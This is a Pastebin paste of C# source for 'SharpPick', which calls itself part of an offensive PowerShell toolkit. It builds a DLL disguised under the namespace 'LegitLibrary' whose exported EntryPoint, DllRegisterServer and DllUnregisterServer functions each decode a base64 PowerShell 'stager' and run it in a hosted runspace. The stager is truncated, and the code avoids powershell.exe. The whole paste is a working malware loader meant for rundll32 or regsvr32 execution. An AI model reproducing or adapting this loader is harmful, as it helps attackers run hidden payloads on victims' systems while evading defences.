Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*
- * SharpPick aka InexorablePoSH
- * Description: Application to load and run powershell code via the .NET assemblies
- * License: 3-Clause BSD License. See Veil PowerTools Project
- *
- * This application is part of Veil PowerTools, a collection of offensive PowerShell
- * capabilities. Hope they help!
- *
- * This is part of a sub-repo of PowerPick, a toolkit used to run PowerShell code without the use of Powershell.exe
- */
- using System;
- using System.IO;
- using System.Resources;
- using System.Collections.Generic;
- using System.Linq;
- using System.Text;
- using System.Net;
- //Adding libraries for powershell stuff
- using System.Collections.ObjectModel;
- using System.Management.Automation;
- using System.Management.Automation.Runspaces;
- using System.Diagnostics;
- using System.Reflection;
- using System.Runtime.InteropServices;
- using RGiesecke.DllExport;
- namespace LegitLibrary
- {
- public class Program
- {
- public static string RunPS(string cmd)
- {
- //Init stuff
- Runspace runspace = RunspaceFactory.CreateRunspace();
- runspace.Open();
- RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);
- Pipeline pipeline = runspace.CreatePipeline();
- //Add commands
- pipeline.Commands.AddScript(cmd);
- //Prep PS for string output and invoke
- pipeline.Commands.Add("Out-String");
- Collection<PSObject> results = pipeline.Invoke();
- runspace.Close();
- //Convert records to strings
- StringBuilder stringBuilder = new StringBuilder();
- foreach (PSObject obj in results)
- {
- stringBuilder.Append(obj);
- }
- return stringBuilder.ToString().Trim();
- }
- }
- public class Service
- {
- public static void Exec()
- //static int Main(string[] args)
- {
- string stager = "WwBSAEUARgBdAC4AQQBTAFM...[SNIP]";
- var decodedScript = Encoding.Unicode.GetString(Convert.FromBase64String(stager));
- //We should now have the script variable filled... double check before executing
- string results = Program.RunPS(decodedScript);
- }
- }
- class Exports
- {
- [DllExport("EntryPoint", CallingConvention = CallingConvention.StdCall)]
- public static void EntryPoint(IntPtr hwnd, IntPtr hinst, string lpszCmdLine, int nCmdShow)
- {
- Service.Exec();
- }
- [DllExport("DllRegisterServer", CallingConvention = CallingConvention.StdCall)]
- public static void DllRegisterServer()
- {
- Service.Exec();
- }
- [DllExport("DllUnregisterServer", CallingConvention = CallingConvention.StdCall)]
- public static void DllUnregisterServer()
- {
- Service.Exec();
- }
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement